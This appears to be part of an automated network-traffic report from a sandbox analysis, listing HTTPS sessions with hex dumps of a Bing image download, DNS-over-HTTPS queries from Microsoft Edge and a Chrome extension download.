                                                                                                                                                                                                                  Data Ascii: Fg=46my40Lmd_>d[zVhZQZ@pihM\T[q$2OW,|<!?gzBEG=`/G\9i"x|<[SM]&Xnvzk;Q[O%/&y?<VWIjMG'


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  13192.168.2.649734150.171.28.10443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC346OUTGET /th?id=OADD2.10239381742050_1SU74Q4K5S59B84Q9&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                  Content-Length: 832073
                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: EC40E017DD1B4692B93557929D5F2E83 Ref B: EWR30EDGE0415 Ref C: 2024-12-18T20:06:17Z
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:16 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 a6 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 30 39 3a 33 35 3a 33 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                  Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 09:35:308
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC16384INData Raw: d2 46 fb a4 ad 94 5a 66 2d dc ce 9a df f8 6a 9d c4 0c b5 bb 70 8a f1 ff 00 76 a8 4c 98 fb d5 d3 09 b3 09 45 6c 65 30 db 49 53 dd 25 56 63 fd da ea 8e a7 3c 9d 99 1c 87 6f dd aa ec 69 f3 1a 8f 15 aa 46 4d ea 2f de a8 5a a6 51 fb ba 63 0a a4 49 0b 52 c6 37 51 b3 75 4d 6f 1d 54 9e 82 44 91 c6 cf 57 6d e0 d9 1d 16 69 b6 3d cd 57 16 25 64 ff 00 6a b9 e7 27 b1 bc 55 f5 33 24 4f df d4 f6 f1 2a c9 f3 7d ed ec bf f0 21 d4 54 1a c4 8d 65 a6 dd dd 2c 72 33 5a db c9 2a 22 26 ee 8b 9a f3 2d 63 c7 6b a5 cf a4 d9 d9 c7 ba de ce da 4f 9d e4 f9 9d 9d 7c af f8 13 ee dc f9 ef bf df 35 c5 8d c7 c3 0b 14 e5 b1 d1 87 c3 ca a5 ed d0 ef fc 7d af c1 e1 fd 35 24 93 e5 dc f1 b2 7c fb 7e 55 91 37 0e 9d d7 8a a7 e1 df 12 ea 77 1f 0d 6f b5 65 8e 0f b4 59 bb 45 6e e9 b5 97 77 98 ed e5
                                                                                                                                                                                                                  Data Ascii: FZf-jpvLEle0IS%Vc<oiFM/ZQcIR7QuMoTDWmi=W%dj'U3$O*}!Te,r3Z*"&-ckO|5}5$|~U7woeYEnw
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC16384INData Raw: 8a 29 71 4e c5 3b 14 9b 01 b8 a3 14 ec 52 ed f6 a5 72 b9 46 62 9d 8a 5d be d4 6d f6 a9 b9 42 62 8c 53 b1 4a a2 93 60 35 45 2e 29 d8 a3 15 20 37 14 e5 14 ec 52 28 a5 70 11 69 d8 a5 db ed 4b 8a 43 42 6d f6 a3 6f b5 2e 29 68 18 98 a5 a7 73 47 34 98 0c c5 3f 9a 4c 53 b1 50 68 37 14 62 9d 8a 5d be d4 0e c2 62 97 6f b5 2e 29 d8 a0 2c 5d e6 93 34 94 ee 6b e5 4f a5 17 34 aa 69 bc d1 40 f6 24 a5 53 4c 53 4b 9a 43 25 53 4e a8 94 d3 b3 48 a1 d9 a7 f3 51 d1 49 80 fc d2 f3 4d a2 a0 a8 8e e6 9d 51 66 9d 9a 0a 1f 4e a8 e9 db bd ea 40 75 3b 9a 8f 77 bd 3a a4 68 77 34 b9 a8 f3 4b 41 63 a9 73 49 cd 1c d0 01 45 1c d1 40 05 3a 9b 4e a0 01 6a 4e 6a 35 a7 50 03 b9 a3 9a 39 a5 5a 00 16 9c b4 8b 4a b4 00 e5 a7 2d 27 34 50 03 a8 a2 8d de f4 ee 01 49 8a 5d de f4 da 64 f2 87 34 da
                                                                                                                                                                                                                  Data Ascii: )qN;RrFb]mBbSJ`5E.) 7R(piKCBmo.)hsG4?LSPh7b]bo.),]4kO4i@$SLSKC%SNHQIMQfN@u;w:hw4KAcsIE@:NjNj5P9ZJ-'4PI]d4
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: 69 3a 3b d9 da c9 e6 df 37 ee 1e 18 9f e5 48 f6 ee 7f 30 ff 00 b4 cc 83 d7 09 ef 51 5d 6a 11 36 ab 77 34 32 46 d6 f6 0e d1 5b fc 8b f3 b7 0a ef b8 72 ff 00 77 8a ad f6 7f 3f 62 c7 26 dd d0 b5 cd c2 27 de da 3e 63 f9 7f 8d 17 34 2d 5d 0f b5 47 0c 36 72 3c ab f3 79 d7 13 7d d7 63 d7 fc f6 a6 cd 7f 6c 96 e9 1a cf 1d c4 91 7c be 4e cf 29 51 47 fb 5c d6 2e b1 ad f9 16 ff 00 e8 72 6d 54 76 f9 36 2e dd a3 fc 4d 62 5d 6b 7b ee 92 46 9f 6c d2 fc df 26 ef 93 3c 6f 6d 9d 85 4e ad 89 c9 23 b6 d0 f4 0f 19 f8 eb c4 70 e8 ba 0d 85 8d fc 91 23 4e f3 3c 1b 7e ca a3 1f 31 99 b9 db fe f6 79 af 7a f8 6f f0 33 c3 5a 0e 95 0d d7 88 20 fe d6 d5 9b 6b 5c 3c d3 b7 90 8d fd d4 54 da 19 7f df ce 6b ca 7e 1e a6 af a6 f8 45 75 8d 36 49 2e 9a dd d6 2f 26 c7 ce f3 7c b7 cb 89 61 99 3f
                                                                                                                                                                                                                  Data Ascii: i:;7H0Q]j6w42F[rw?b&'>c4-]G6r<y}cl|N)QG\.rmTv6.Mb]k{Fl&<omN#p#N<~1yzo3Z k\<Tk~Eu6I./&|a?
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: 5a 6a e9 e8 71 3d 34 39 cf 18 69 d1 5e f8 57 53 b1 ba b0 92 fe 1b 8b 19 95 ed 11 d9 5a 6f dd 9f 93 e4 e7 9a f9 9f e1 4d bd f3 f8 3a e2 c6 e2 ee fb 46 fb 55 f4 7a 7d de a2 f0 49 b9 26 10 cb 14 6b 22 a1 de ab f7 d7 fe da 7d da fa ed 62 56 af 00 f8 ed 2d 9d ef 89 bc 5f ab 5b f9 91 7f 63 5c 58 40 ee e8 cb be 4f b3 c8 92 c8 37 75 fb a8 03 7a 73 5e 7e 67 14 d4 66 f7 5f f0 e6 d8 3b c5 b4 79 9f 86 e7 82 ff 00 c3 3a e6 83 e4 4e b7 56 b6 f1 cf e7 26 d6 5d a1 9d 9b 6a e0 fc ae 8f bb fb c8 ca bf c3 5e 2b e3 ad 39 ac 75 cd 41 7c 89 22 8e 29 97 e4 df bb f8 7e f6 47 18 3d 78 af 4b 98 41 e1 ff 00 19 5a 5e 69 37 f3 dc 5b dd 5a 2c 1f f3 d5 a1 fd df 96 87 7f f1 2f 1f fd 6e d5 cc 7c 58 d1 2e 65 fb 5e bd 67 6f 22 da db c3 0c 57 70 ba 32 f9 39 e8 db 70 30 a5 bf 23 5e 25 17 69
                                                                                                                                                                                                                  Data Ascii: Zjq=49i^WSZoM:FUz}I&k"}bV-_[c\X@O7uzs^~gf_;y:NV&]j^+9uA|")~G=xKAZ^i7[Z,/n|X.e^go"Wp29p0#^%i
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: ae 69 34 fb 68 a2 ba 9b 4d f2 3f 79 2b ac 10 be f6 56 86 40 df 2f e6 3b 62 bd 07 e3 16 99 a8 6b de 03 59 2e ad 23 8a ea 24 dd 33 ef 65 6d d0 a9 0f fe fe 37 6e 5f f6 78 fe ed 79 d5 e4 9f 6d b1 fe d0 f3 23 5b e6 75 89 d1 1d 95 5f e6 fb fb bf 83 18 5a ba 73 72 82 ee 87 0d 2e 47 34 73 c1 1a 43 f7 6e 19 3e e3 a7 df ed c7 bf cb de b0 ee 2e 35 56 82 de ce 3f 33 cb 5f 99 37 ee fb a7 ef 01 9e 2b 5b 52 d6 ee 5e d5 2c da 38 e5 9a d5 3e 49 9d 17 e7 cf be 3a 7f b2 df a5 61 dd 18 b5 1b 5b 4f 2e 49 2d ef 22 fd d5 c7 cf b5 5d 4f 2b 8e 3e f0 fd 7d ab a2 31 ee 8c a7 22 c7 87 64 d4 f4 6d 57 72 da 49 3e e4 68 b6 6f fb ea 57 fb fd b8 ae a7 e1 8f 88 22 d4 b5 59 ac f5 8d 97 91 cb 63 33 6f d5 2f 64 f2 93 e5 f9 94 2f 43 95 dc 3b 57 37 ad 5f dc de 5f 58 ad e7 96 b2 2d a4 70 25 c6
                                                                                                                                                                                                                  Data Ascii: i4hM?y+V@/;bkY.#$3em7n_xym#[u_Zsr.G4sCn>.5V?3_7+[R^,8>I:a[O.I-"]O+>}1"dmWrI>hoW"Yc3o/d/C;W7__X-p%
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: 86 c2 ff 00 1e 7b 57 0d 3b 7b 44 6d 38 d8 e5 6c 75 bd 3d f4 db 8f ec b8 36 ee f9 5e 64 46 f9 f1 c2 46 d2 37 2d 9e 9f 27 e5 55 f5 6b 8d 32 c2 4b 8f ed 84 83 ed 9b 19 7c 9b 78 23 fd cf cb 9d ff 00 26 02 37 fb 3f 3e 3d 2b cf f5 4f 1a df 5e c1 0a c3 04 11 79 49 f7 e1 dc dd 7a fd e3 5c e5 c6 a1 73 2c 8f 71 71 3c 9f 2e dd e8 9f c1 9e 85 6b ba 8e 1e 4a f7 d0 ca 55 62 96 87 b7 e8 7e 1e f0 85 fc 8f 6f 79 f6 16 91 7f d4 df 5a 4f 27 91 e6 1f f9 65 70 bc 7c a3 3f eb 10 7c bd f7 0a a7 ad 78 4f 45 d4 75 2b 8b ad 4b 52 be b5 5b 59 bc bb 8b 47 45 95 b6 8f f9 66 1b f8 3d 01 e8 7a ed e6 bc 8f 4b d5 a2 8a e9 24 8e dd 19 a2 7d df 23 b2 ef ff 00 eb 1a f7 0d 36 5b 3f 1a 78 0f 43 be be 9e 45 d5 3f 79 63 69 a8 c3 b7 73 ec c6 16 55 eb fb b3 b1 57 77 df 47 c6 7e 45 ab 9d 39 ad 6f
                                                                                                                                                                                                                  Data Ascii: {W;{Dm8lu=6^dFF7-'Uk2K|x#&7?>=+O^yIz\s,qq<.kJUb~oyZO'ep|?|xOEu+KR[YGEf=zK$}#6[?xCE?ycisUWwG~E9o
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16067INData Raw: 99 b0 10 ab e7 32 ab 36 06 32 d9 f5 a3 41 7b 3d 47 c4 77 13 5e 69 b2 5e 69 f6 e9 fb ed 93 f9 5f 66 59 a4 8d 77 2e c1 db 73 f5 ea cd 9e b5 cf d9 cf 73 2c 16 f2 34 92 4b 1e 97 70 d1 5b f9 cf b9 53 12 64 7d df e1 dd c9 03 b3 d6 f7 83 75 5b cd 26 0d 4e d7 49 f3 1b fe 12 3d 0e 38 af a1 9a 0d bf 66 90 48 fc c4 e1 8e ed 9b d3 04 f5 df d0 60 35 46 aa 2c 69 ea 6d 6b da a6 91 79 75 0e 9f a5 e9 b1 c5 0d 9a 4f 14 b7 db db 76 a1 1b cd 24 b0 ce c8 d9 65 db 1c b1 a6 de 4f c9 4c d1 65 8a ea 47 bc 9a ee 0b 56 89 e3 96 68 6e 27 65 f3 bc b6 73 80 aa a7 a2 a7 27 3e 95 81 e2 8b 9b cb cb 17 bc b8 9f 75 d5 ad 8c 7f 71 fe ff 00 96 df fa 16 d8 f9 ad 19 13 fd 3b 74 72 47 b7 7b 7f 1a af ca 15 25 4f bd ea ad 8f 73 4a 17 e5 d4 be a7 73 6f 70 de 7d a5 c2 fc d1 b5 a4 72 a4 28 eb e6 ee
                                                                                                                                                                                                                  Data Ascii: 262A{=Gw^i^i_fYw.ss,4Kp[Sd}u[&NI=8fH`5F,imkyuOv$eOLeGVhn'es'>uq;trG{%OsJsop}r(
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: d4 a1 93 4f 9e 0f b5 6c dc 8f 34 fb 7e 5d bf c3 bb 1d 47 4a af 75 fd a1 14 9b 66 f3 22 69 61 f2 91 e6 7d cb b4 fc c1 85 38 4a c5 4a 29 f4 31 e6 b4 89 24 7f b4 79 8d bb ee 22 56 a7 d9 ac 6e 34 d7 ba f3 e7 b7 f9 19 be e7 cb 36 18 28 5e dd 3e 6e 7f 4e 2b 36 d6 0b cb db af 2e d6 39 19 b7 b7 dc ad fd 37 4b df a5 5c 47 6f 24 17 17 4c 8c d0 c2 8f f3 6d 4c ee 60 dc 27 1d b1 9d df a5 2a d3 51 b5 de a4 53 8d ef a6 86 6c 37 f0 59 4f 0c d6 70 49 2f 94 ff 00 7d df ee 7d 3a fe 15 42 68 99 a7 9a 69 23 8f e6 f9 9f e4 fe ff 00 f0 a8 ae 8e cf 4a 81 e4 b7 5f dd b5 c5 c7 df 44 81 97 c9 ca ee 19 da 31 fc 5e ff 00 77 15 5e c6 4b 3d 37 c4 7f 37 91 79 f6 79 be 4f e2 57 f9 78 fb dd 7d c5 65 ed 95 dd 96 a4 54 5d 19 bb 63 14 fe 05 f1 04 2d 79 24 77 b6 b6 e9 1c ae f0 ed fb af 9f f5
                                                                                                                                                                                                                  Data Ascii: Ol4~]GJuf"ia}8JJ)1$y"Vn46(^>nN+6.97K\Go$LmL`'*QSl7YOpI/}}:Bhi#J_D1^w^K=77yyOWx}eT]c-y$w
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: 93 6b 66 d6 b7 0d e7 6c f9 7c e5 7f f5 be 67 fb df 33 7d 64 3c fc ab 8c db e5 9f 35 f6 fc c6 95 d7 2d b7 3c 8f 54 3b 2e a5 b1 fd e3 2c be 5c af b3 fb c1 47 dd ff 00 be a9 fe 13 b9 9f fe 12 cb 78 db f7 b0 dc 45 24 4e db fe 57 52 a7 fe f9 c5 68 78 e3 c3 f2 e9 d7 d7 17 90 c9 be ce 2d bb 26 df f3 6d f3 36 a5 62 e9 a1 ac 3c 41 6f 71 24 72 2a b7 df 4f f6 8a ed ff 00 d9 ab d2 8c 94 e9 b6 8e 3b 38 cc ea f1 3b 69 b0 ac 71 bc be 52 2c 68 e8 9b be 6e db bb 51 a7 eb aa f6 33 43 a8 4f f6 59 2d 6d da 2f b8 cc ae c8 df 2f fb bf 2f 19 a9 f4 7b 75 97 c2 37 71 c9 a9 48 ad bd 65 b4 b4 f2 3f d7 29 fb ed ff 00 00 68 b6 9f ff 00 5d 66 5f 24 5a 95 d3 c7 0c 92 4b 32 fc a8 8e 9b 99 d8 7a ff 00 f1 55 cb 18 a7 74 cd 9d d6 a8 ea 74 1b 89 f5 bf 03 eb 9a a4 9a d4 96 b6 f6 6f 6f 6d b3
                                                                                                                                                                                                                  Data Ascii: kfl|g3}d<5-<T;.,\GxE$NWRhx-&m6b<Aoq$r*O;8;iqR,hnQ3COY-m///{u7qHe?)h]f_$ZK2zUttoom


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  14192.168.2.649772162.159.61.34437816C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  15192.168.2.649774172.64.41.34437816C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  16192.168.2.649791142.250.181.654437816C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:20 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                  2024-12-18 20:06:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC7CZ0UZ67drcZI4imfdyK3crLxFmtx6SBomJC1Qfn8mJZzHNJmIxyaV4JMGqJIHwbMn
                                                                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                  Expires: Thu, 18 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                  Age: 14886
                                                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2024-12-18 20:06:21 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                  Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                  2024-12-18 20:06:21 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                  Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                  2024-12-18 20:06:21 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                  Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                  2024-12-18 20:06:21 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                  Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
